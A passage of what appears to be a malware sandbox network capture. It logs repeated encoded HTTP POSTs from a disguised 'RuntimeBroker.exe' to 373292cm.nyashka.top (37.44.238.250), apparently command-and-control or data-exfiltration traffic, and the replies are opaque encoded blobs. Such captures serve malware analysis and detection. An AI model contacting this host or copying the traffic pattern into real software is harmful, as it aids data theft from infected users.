User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:06.973567963 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:07.269201994 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:07.446542978 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 57095 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:07.474689960 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 1852
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:07.832870007 CET | 1852 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:08.110927105 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:08.244064093 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: [encoded payload omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.6 | 57096 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:07.583159924 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:07.942400932 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:08.233850002 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:08.521922112 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.6 | 57097 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:08.649669886 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2536
Expect: 100-continue
Jan 11, 2025 06:44:09.004661083 CET | 2536 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:09.307610989 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:09.473388910 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.6 | 57098 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:09.605608940 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:09.959104061 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:10.234433889 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:10.407032967 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 57099 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:10.541552067 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:10.895277977 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:11.175615072 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:11.307257891 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  65 | 192.168.2.6 | 57100 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:11.446904898 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:11.801517010 CET | 2544 | OUT | Data Raw: 5f 5c 59 52 54 47 54 50 5b 5f 5a 51 59 51 58 56 57 5f 5d 5d 57 5f 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\YRTGTP[_ZQYQXVW_]]W_SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-. <6.7#=]=[4\<>]?>+X7<#W;+*87 ];.&F$.Y/=
                                                                                  Jan 11, 2025 06:44:12.103729963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:12.240104914 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  66 | 192.168.2.6 | 57101 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:12.366627932 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:12.744771004 CET | 2544 | OUT | Data Raw: 5f 54 59 57 54 46 54 58 5b 5f 5a 51 59 52 58 53 57 5c 5d 5d 57 50 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYWTFTX[_ZQYRXSW\]]WPSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\83("[;7 )[*=0^?=5(-?X#<7P ! +:84V!^8>&F$.Y/1
                                                                                  Jan 11, 2025 06:44:13.004443884 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:13.140053034 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  67 | 192.168.2.6 | 57102 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:13.261321068 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:13.614279032 CET | 1872 | OUT | Data Raw: 5a 55 5c 52 54 45 54 5c 5b 5f 5a 51 59 53 58 56 57 51 5d 5b 57 51 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\RTET\[_ZQYSXVWQ][WQS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-. 0!$7#&*=7?.-[?[("//S#0V+ #V%_,>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:13.909260035 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:14.042099953 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 55 29 1b 35 03 25 3b 01 0d 33 1d 2e 1e 2a 13 0d 10 29 2d 2a 04 24 01 36 04 25 3e 30 1c 24 2b 29 5a 2b 00 2e 50 32 06 27 59 2c 34 2b 5d 0c 13 22 5d 23 2a 04 59 32 02 01 03 29 3b 2c 05 35 02 39 04 28 03 2d 50 3f 2f 24 12 28 17 34 03 3c 5c 36 1f 2e 3b 25 15 2f 33 3a 1c 20 04 2b 52 0d 11 24 10 29 2e 21 1d 29 2d 27 5e 21 2b 30 07 27 2d 0f 08 31 0b 2e 52 24 29 3f 03 31 0b 25 50 33 57 35 1d 24 3b 35 07 25 06 36 0c 36 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &U)5%;3.*)-*$6%>0$+)Z+.P2'Y,4+]"]#*Y2);,59(-P?/$(4<\6.;%/3: +R$).!)-'^!+0'-1.R$)?1%P3W5$;5%66"#T,"W3UV


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  68 | 192.168.2.6 | 57103 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:13.275933981 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2532
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:13.630062103 CET | 2532 | OUT | Data Raw: 5a 51 5c 5e 54 44 54 5d 5b 5f 5a 51 59 57 58 57 57 51 5d 53 57 5f 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\^TDT][_ZQYWXWWQ]SW_SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./8!\7 =]*=$_?=%](, 3W $<_#^#=/.&F$.Y/
                                                                                  Jan 11, 2025 06:44:13.905131102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:14.034415960 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  69 | 192.168.2.6 | 57104 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:14.168248892 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:14.520293951 CET | 2544 | OUT | Data Raw: 5f 53 5c 5e 54 43 51 5b 5b 5f 5a 51 59 53 58 5f 57 50 5d 5c 57 5e 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _S\^TCQ[[_ZQYSX_WP]\W^S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.8##-X **3<>:+' R " Q<9##V6,&F$.Y/5
                                                                                  Jan 11, 2025 06:44:14.807893038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:14.940356970 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  70 | 192.168.2.6 | 57105 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:15.072345018 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:15.426804066 CET | 2544 | OUT | Data Raw: 5a 56 5c 57 51 42 54 59 5b 5f 5a 51 59 54 58 50 57 59 5d 5f 57 5e 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZV\WQBTY[_ZQYTXPWY]_W^S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..#?"> ] 3>*'(>9Z<-/7<? !($4!X;&F$.Y/)
                                                                                  Jan 11, 2025 06:44:15.719676971 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:15.850136042 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  71 | 192.168.2.6 | 57106 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:15.981650114 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:16.332801104 CET | 2544 | OUT | Data Raw: 5a 55 59 54 54 41 54 59 5b 5f 5a 51 59 52 58 57 57 59 5d 5b 57 51 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYTTATY[_ZQYRXWWY][WQSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/ $"-'7#!Z)=4]<>)^+=#Y#,(#! W(9?#>;.&F$.Y/1
                                                                                  Jan 11, 2025 06:44:16.619368076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:16.795833111 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  72 | 192.168.2.6 | 57107 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:16.931185007 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:17.285975933 CET | 2544 | OUT | Data Raw: 5f 54 5c 56 54 44 54 51 5b 5f 5a 51 59 55 58 50 57 5e 5d 5b 57 50 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _T\VTDTQ[_ZQYUXPW^][WPS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/$"+ V)\*[0>==([?[7<(!!?97 1^/&F$.Y/-
                                                                                  Jan 11, 2025 06:44:17.569617987 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:17.700572014 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  73 | 192.168.2.6 | 57108 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:17.820477009 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:18.177826881 CET | 2544 | OUT | Data Raw: 5a 51 5c 53 54 44 54 59 5b 5f 5a 51 59 53 58 5e 57 50 5d 52 57 51 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\STDTY[_ZQYSX^WP]RWQSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-8'A68^7 )#+5_<=4 #!0**$7 9..&F$.Y/5
                                                                                  Jan 11, 2025 06:44:18.468466043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:18.606482029 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  74 | 192.168.2.6 | 57109 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:18.744658947 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  75 | 192.168.2.6 | 57110 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:19.043881893 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:19.395277023 CET | 1872 | OUT | Data Raw: 5f 51 5c 50 51 43 51 5a 5b 5f 5a 51 59 54 58 5e 57 5e 5d 52 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _Q\PQCQZ[_ZQYTX^W^]RWZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;3?!45]*?._?'"<0#!V(04^;>&F$.Y/)
                                                                                  Jan 11, 2025 06:44:19.690864086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:19.822074890 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
